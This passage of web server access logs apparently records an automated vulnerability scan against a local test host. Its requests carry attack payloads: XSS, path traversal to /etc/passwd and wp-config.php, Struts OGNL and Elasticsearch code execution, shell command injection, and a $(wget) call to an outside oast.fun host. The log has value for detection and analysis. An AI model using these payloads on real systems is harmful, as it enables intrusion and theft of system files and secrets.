/wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /help/admin-guide/test.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"{}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sfsites/aura HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/setup-config.php?step=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.184","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.191","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/thumb.php?dir=http\x5C..\x5Cadmin\x5Clogin\x5Clogin_check.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pandora_console/mobile/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /RestAPI/ImportTechnicians HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /header.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /schema HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /echo-server.html?code=test&state=http://www.attacker.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /prweb/PRRestService/unauthenticatedAPI/v1/docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /VisionHubWebApi/api/Login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.049","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NON_EXISTING_PATH/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /footer.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"{\x0D\x0A \x22size\x22: 1,\x0D\x0A \x22query\x22: {\x0D\x0A \x22filtered\x22: {\x0D\x0A \x22query\x22: {\x0D\x0A \x22match_all\x22: {\x0D\x0A }\x0D\x0A }\x0D\x0A }\x0D\x0A },\x0D\x0A \x22script_fields\x22: {\x0D\x0A \x22command\x22: {\x0D\x0A \x22script\x22: \x22import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\x5C\x22cat /etc/passwd\x5C\x22).getInputStream()).useDelimiter(\x5C\x22\x5C\x5C\x5C\x5CA\x5C\x22).next();\x22\x0D\x0A }\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_search?pretty HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cdn-cgi/image/width/https://ca285tosmpvbafqg07h09hrssn9ohk1qu.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces/default/secrets HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /STATE_ID/123/agentLogUploader HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.idea/dataSources.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"{\x22sheet\x22:[\x22.es(*)\x22],\x22time\x22:{\x22from\x22:\x22now-1m\x22,\x22to\x22:\x22now\x22,\x22mode\x22:\x22quick\x22,\x22interval\x22:\x22auto\x22,\x22timezone\x22:\x22Asia/Shanghai\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/timelion/run HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.175","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"\x221\x22:1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /knowage/servlet/AdapterHTTP?Page=LoginPage&NEW_SESSION=TRUE&TargetService=%2Fknowage%2Fservlet%2FAdapterHTTP%3FPage%3DLoginPage%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /goforms/rlminfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /account/register HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /database.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/index.php/home/file/user_pics HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"command=2&ipAddr=&dnsAddr=$(wget+http://ca285tosmpvbafqg07h0rwrtm7a1achhs.oast.fun)&interface=0&netType=0&scrFilter=&dstFilter=&fileSave=false&pcapSave=false&fileSize=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi/networkDiag.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/spec/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.153","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"Password=29KAXvc68GlkqjB2VGN7D2M7VCC&ConfirmPassword=29KAXvc68GlkqjB2VGN7D2M7VCC&RememberMe=true&__RequestVerificationToken={{csrf}}&RememberMe=false","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /account/register HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1/account/register", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.168","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"op=login&username=;`cat /etc/passwd`&password=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"127.0.0.1/module/login/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/spec/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /modules/babel/redirect.php?newurl=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22params\x22:{\x22token\x22: \x22Test\x22},\x22method\x22:\x22web.LoginSTS\x22}","remote_addr":"192.168.144.1","http_host":"ca285tosmpvbafqg07h09pgx3ybuoxwtp.oast.fun","request":"POST /minio/webrpc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /http://127.0.0.1example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.158","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opensis/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger/ui/index HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 